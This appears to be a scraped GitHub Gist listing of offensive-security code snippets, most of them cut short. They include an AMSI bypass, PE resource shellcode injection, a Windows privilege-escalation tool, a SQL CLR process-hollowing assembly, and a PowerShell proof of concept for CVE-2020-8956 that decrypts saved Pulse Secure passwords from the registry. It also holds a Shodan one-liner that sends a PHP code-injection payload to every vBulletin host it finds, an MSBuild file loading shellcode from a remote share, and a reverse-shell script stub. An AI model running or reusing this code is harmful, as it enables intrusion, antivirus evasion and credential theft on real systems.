@WKL-Sec
WKL-Sec / Kernel32BaseAddrRetrieval.cpp
Created February 27, 2024 20:22
Retrieves the base address of kernel32.dll using x64 assembly in C++
#include <iostream>
#include <windows.h>
void* GetBaseAddressOfKernel32() {
void* kernel32BaseAddress = nullptr;
__asm {
mov rdi, 0xFFFFFFFFFFFFFFFF // Set RDI to -1
inc rdi // Increment RDI to 0
mov rax, 0 // Zero out RAX
@susMdT
susMdT / Program.cs
Created February 24, 2023 02:57
C# AMSI bypass with hardware breakpoint
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
// CCOB IS THE GOAT
@Wra7h
Wra7h / PEResourceInject.cs
Created October 17, 2022 05:39
PEResourceInject
/*
* PEResourceInject (C# version for x64) by Wra7h
*
* Add a bitmap resource to an executable. Parse the PE header and calculate the address of the shellcode.
* This avoids direct calls to VirtualAllocEx & WriteProcessMemory, but will modify the target exe on disk,
* and this implementation will create a backup of the executable in the same directory with a ".bak" extension.
*
* Compile: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe .\PEResourceInject.cs
* Use: PEResourceInject.exe <C:\Path\to\target\program.exe> <C:\Path\to\shellcode.bin>
*
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
@skahwah
skahwah / hollow.cs
Last active March 20, 2024 07:55
Custom assembly that is compatible with SQL CLR attacks.
//C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\hollow.cs
//SQLRecon.exe /auth:local /host:SQL02 /username:sa /password:Password123 /module:clr /dll:c:\temp\hollow.dll /function:BaconTime
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;
@unbaiat
unbaiat / CVE-2020-8956.ps1
Created October 29, 2020 07:53 — forked from qkaiser/CVE-2020-8956.ps1
CVE-2020-8956 - Powershell PoC
Add-Type -AssemblyName System.Security;
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
$ivename = $ive.PSPath.split('\')[-1].ToUpper()
Write-Host "[+] Checking IVE $($ivename)..."
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
# 3 possible value names for password
$encrypted = $ive.Password1
if(!$encrypted){
@qkaiser
qkaiser / CVE-2020-8956.ps1
Created October 27, 2020 20:07
CVE-2020-8956 - Powershell PoC
Add-Type -AssemblyName System.Security;
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
$ivename = $ive.PSPath.split('\')[-1].ToUpper()
Write-Host "[+] Checking IVE $($ivename)..."
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
# 3 possible value names for password
$encrypted = $ive.Password1
if(!$encrypted){
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
MyCode='<base64 encoded x64 shellcode>'
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
</Target>
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>
#!/bin/bash
# This is not great...
#
NAME=Shell
TAC=TrustAllCertificates
LHOST=10.0.0.254
LPORT=4444
COMMAND='"powershell"'
CURDIR=$(pwd)